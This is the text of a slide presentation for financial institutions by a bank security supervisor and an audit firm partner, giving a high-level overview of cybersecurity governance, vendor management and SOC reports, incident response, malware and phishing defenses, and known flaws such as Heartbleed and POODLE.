Cybersecurity and Technology Update Paul Rainbow, Information Security Supervisor, Umpqua Bank Francis Tam, Partner, Moss Adams LLP
Agenda Cybersecurity Governance Threat Intelligence/Monitoring Vendor Management Third Party Service Providers SSAE16 Incident Response/Resilience Strategy Focus on Technology Threat Detection and Monitoring Malware and Social Engineering Public Security Flaws
Cybersecurity $45 million cyberheist and ATM cash out scheme of December 2012, May 2013, and November 2013. Twenty five suspects detained in an international cybercrime ring in April 2015. Hijack of domain name service (DNS) of Federal Reserve Bank of St. Louis to redirect (research.stlouisfed.org ) visitors to lookalike sites that were under attackers control in April 2015. In January 2015, Morgan Stanley fired an employee who they claim stole account data for hundreds of thousands of their wealth management clients. Stolen information for approximately 900 of those clients was posted online for a brief period of time, the company says.
Cybersecurity ebay May 2014: 145 million user accounts impacted; $200 million hit to revenue Anthem Health Insurance February 2015: PII for 80 million customers stolen; $100+ million to fix Home Depot September 2014: 109 million customer records stolen (56 million payment card, 53 million e mails) icloud, Sony, Neiman Marcus, UPS, Jimmy Johns, and on, and on, and on..
Cybersecurity Heightened awareness of cybersecurity Legislation and regulations on cybersecurity and privacy SB 1386 California Security Breach Information Act Red Flag Act PCI DSS Cybersecurity Information Sharing Act of 2014 (CISA) (proposed)
Cybersecurity New federal agencies on cybersecurity Cyber Threat Intelligence Integration Center (CTIIC; pronounced see tick), which culls cyberthreat information from a variety of sources within the government and business community and then produces timely intelligence about the latest threats and threat actors The Department of Homeland Security's National Cybersecurity and Communications Integration Center (NCCIC; pronounced n kick) is an around the clock cyber situational awareness, incident response, and management center that is at the nexus of cyber and communications integration for the federal government, intelligence community, and law enforcement
Cybersecurity
Cybersecurity FFIEC members include: (http://www.ffiec.gov) Board of Governors of the Federal Reserve System Consumer Financial Protection Bureau Federal Deposit Insurance Corporation National Credit Union Administration Office of the Comptroller of the Currency State Liaison Committee
Cybersecurity: Evolution of Technology in FI
Cybersecurity: Current Threats
Cybersecurity: Current Threats
Cybersecurity: Cyber Risk Management Governance Threat intelligence Third party/vendor management Incident response and resilience
Cybersecurity: Governance
Cybersecurity: Threat Intelligence Internal Resources Internal audit reports Fraud detection tools Anti Money Laundering/ Office of Foreign Assets Control/Bank Secrecy Act tools External Resources Financial Services Information and Sharing Analysis Center (FS ISAC) FBI InfraGard United States Secret Service (USSS) Electronic Crimes Task Forces Conferences Vendor Reports CTIIC NCCIC
Threat Monitoring It is critical in today s fast changing environment to stay up todate on threat trends There are various ways to do this, but FS ISAC is a valuable asset to Financial Institutions and Financial Services companies. It was mentioned in the recent FDIC Cyber Security Awareness presentation.
Threat Monitoring FS ISAC provides ongoing trend data and analysis on cybersecurity threats and activities Members submit samples of phishing and attack activity, which is sanitized and publicized to the group Groups also exist for peer to peer communication and submission of data
Cybersecurity: Third Party/Vendor Management
Cybersecurity: Third Party/Vendor Management The latest FFIEC guidance builds on updated third party risk guidance the OCC issued in August 2014 On February 6, 2015, the FFIEC added a 16 page appendix to its Business Continuity Planning (BCP) Booklet, which was first issued in March 2003 and included in the FFIEC's IT Examination Handbook The new appendix, "Strengthening the Resilience of Outsourced Technology Services," specifically calls out key cybersecurity risks, such as distributed denial of service attacks, the need for more due diligence of third parties, and infrastructural interdependencies
Cybersecurity: Third Party/Vendor Management Appendix J of the BCP Booklet discusses the following four key elements of BCP that a financial institution should address to ensure that their technology service providers (TSPs) are providing resilient technology services: Third Party Management Third Party Capacity Testing with Third Party TSPs Cyber Resilience
Cybersecurity: Third Party/Vendor Management Cybercriminals leapfrog through Bank information supply chains A bank's cybersecurity is often only as good as the cybersecurity of its vendors; unfortunately, those third party firms can provide a backdoor entrance to hackers who are seeking to steal sensitive bank customer data NYDFS expects to move forward by end of 2015 on regulations strengthening cybersecurity standards for banks' third party vendors, including potential measures related to the representations and warranties banks receive about the cybersecurity protections in place at those firms Federal guidance, including FFIEC, will mirror soon
Cybersecurity Third Party/Vendor Management Who are your vendors? One critical element of a third party risk program is knowing who all your vendors are How can you identify all the vendors that are used by your organization?
Cybersecurity Third Party/Vendor Management Risk Rating Areas Security Access to network/systems? Share sensitive data? Web presence or customer access to data via the web? Subcontractors?
Cybersecurity Third Party/Vendor Management Monitoring Audit reports and other required reporting (SSAE 16) that address business continuity, security, and other facets of the outsourcing relationship can be effective tools Various reports can provide evidence based on the risk and nature of the service provided ISO27001, FISMA, PCI, HIPAA, Internal Audit reports, etc.
Cybersecurity Third Party/Vendor Management SSAE16 Reports (formerly SAS70) SSAE16 reports are a useful (and widely utilized) way to monitor third party service providers Changes from SAS70 to SSAE16 have altered the nature of the reports It is important to understand the different types of reports in order to ensure that reliance is justifiable Review and understand the scope. Many reports carve out data canters or other business lines/technologies.
Report Comparison SOC 1 1. Auditors report 2. Detail system description 3. Management assertion 4. Management controls 5. Auditor tests of controls and results of those tests control objectives SOC 2 1. Auditors report 2. Detail system description 3. Management assertion 4. Management controls 5. Auditor tests of controls and results of those tests criteria SOC 3 1. Auditors report 2. Detail system description 3. Management assertion 4. Management controls 5. Auditor tests of controls and results of those tests Source: AICPA 2011
Trust Principles Security Availability Processing Integrity Confidentiality Privacy
Type 1 vs. Type 2 Type 1 reports are for a point in time Type 2 reports are for a period of time
Cybersecurity: Incident Response and Resilience Preparation Incident response plan and policy Incident response team Escalation: Internal Notification: External
Cybersecurity: Strategy People security awareness training, constant education, instill in the culture Process SOPs, SDLC, change management, provisioning/ deprovisioning, access authorization Policy acceptable use policy, e mail security, BYOD policy, system acquisition, incident response and escalation, business continuity Technology firewall(s), network design, IDS/IPS, AV/DLP, MDM, encryption, system alerting Monitoring ongoing review, awareness and risk assessment/ business impact analysis Governance tone at the top, IT strategy, and cybersecurity insurance
Cybersecurity: Technology Areas Network topology, architecture, and design Network device security DMZ and VLAN segmentation External connections and extranets Wireless access point security Web server security Internet content filtering and scanning Intrusion detection/prevention systems Physical system placement and protection Data center physical access and security controls Technical Citrix/Terminal Services Logging, monitoring, and alerting Server security and baselines Virtual environment security Phishing Workstation security and hardening Operating system security and configuration Application security Database security Physical Access logging and auditing Environmental controls Remote access, VPN connectivity, and modem access E mail security Mobile device security, including BYOD strategy Virus, spyware, spam, and other malware filtering Containment measures Data leakage protections (DLP) Data encryption (in transit and at rest) Data backup, restoration, and backup media storage
Cybersecurity: Technology Areas Information security management Information security policies Organizational controls including staffing External party risks (e.g., hosting, cloud service providers, etc.) Compliance with information security laws and regulations (e.g., CJIS, HIPAA, PCI DSS, etc.) Software development lifecycle (SDLC) Source code management Administrative Change management of systems and security components Testing and development procedures Configuration management Authentication/login management Identity management and authorization User awareness and training Segregation of duties Information leakage Security incident response Disaster recovery planning Social Engineering Phishing Security awareness Asset management Media disposal, including paper records Software licensing compliance Self auditing procedures (e.g., account reviews, penetration testing, etc.) Remediation procedures Human Resources security Software and hardware asset tracking Software/firmware patch management Equipment leasing agreements and processes
Malware It is common to receive e mail based malware attempts It can come in the form of an attachment (Word documents have been very common lately) or a link These typically attempt to download and install malware (Dridex has been the most common) or take the user to a drive by download site
Malware Defense The best defense for malware is layered security: Security Awareness Firewall E mail Filtering/Monitoring Local Anti Virus/Anti Malware Intrusion Detection System Patch Management Administrative Rights Network Segmentation
Phishing Phishing comes in many formats, but e mail tends to be most common They usually trend with events or time of year (taxes in April, package delivery in December) The intent varies from disclosure of information to wire transfer scams
Phishing Defense The best defense is security awareness (but this will never be sufficient, as we are all human) Technical controls are also key (e mail/spam filters, dual factor authentication, dual control for key activities)
Security Flaws Heartbleed is a security bug disclosed in April 2014 in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. The vulnerability allows theft of a server s private keys and users' session cookies and passwords. Shellshock is a family of security bugs in the widely used Unix Bash shell, disclosed on September 24, 2014. Many Internet facing services use Bash to process certain requests. The exploit can allow an attacker to gain unauthorized access to a computer system.
Exploits The attackers were able to get user credentials from the memory of a Juniper device, which was vulnerable to the Heartbleed flaw at the time. The attackers used the stolen credentials to log into the corporate network through the VPN.
Poodle The POODLE attack is a man in the middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, they can reveal encrypted messages. http://www.poodletest.com
SSL Labs Tool Qualys SSL Labs has a free tool to scan websites for SSL issues https://www.ssllabs.com/ssltest/index.html
Presenters Paul Rainbow, CPA, CIA, CISA, CISSP, CTGA Information Security Supervisor (509) 714 4865 Francis Tam, CPA, CISM, CISA, CITP, CRISC, PCIP, PCI QSA Partner (310) 295 3852 Questions?